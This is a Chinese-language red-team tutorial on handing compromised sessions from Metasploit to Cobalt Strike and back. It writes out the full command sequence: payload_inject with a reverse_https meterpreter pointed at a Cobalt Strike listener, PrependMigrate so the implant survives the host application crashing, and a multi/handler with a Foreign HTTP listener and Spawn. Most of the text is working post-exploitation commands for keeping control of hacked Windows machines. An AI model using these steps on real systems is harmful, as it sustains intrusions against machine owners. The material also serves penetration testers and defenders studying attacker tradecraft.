0x01 MSF会话传递到CS
1、 CS上的操作
点击Cobalt Strike然后选择监听器,创建一个HTTPS Beacon的监听器即可
创建成功后如下
2、 MSF上的操作
前提是已经获取到了shell,如下:
3、 开始传递会话
首先,background会话
background
接着调用payload_inject模块
use exploit/windows/local/payload_inject
设置HTTPS Payload
set payload windows/meterpreter/reverse_https
设置lhost与lport为CS的监听器的IP与端口
set lhost x.x.x.x
set lport 5555
设置DisablePyaloadHandler为True,这个选项会让MSF避免在其内起一个handler来服务你的payload连接,就是告诉MSF我们已经建立了监听器,不需要再新建监听器了
set DisablePayloadHandler True
设置PrependMigrate为True,这个设置让MSF前置的shellcode在另一个进程当中运行payload stager,如果被利用的应用程序奔溃或者被用户关闭,这个会帮助Beacon会话存活。
set PrependMigrate True
设置当前会话
set session 1
开始传递会话
exploit
整体过程如下:
此时,CS上已经可以看到MSF的会话传递过来了
0x02 CS会话传递到MSF
1、Cobalt Strike上的操作
先让机子上线CS
2、MSF上的操作
首先,在MSF上调用handler模块
use exploit/multi/handler
设置HTTP Payload
set payload windows/meterpreter/reverse_http
set lhost x.x.x.x
set lport 6677
运行该模块
run
整体过程如下:
3、开始会话传递
在CS上先创建一个Foreign HTTP监听,IP和端口设置成上面MSF所设置handler模块的端口和IP
之后在CS上面右击待传递的会话,选择Spawn,选择刚刚创建的Foreign HTTP监听器
来到MSF就可以看见CS的会话已经传递过来了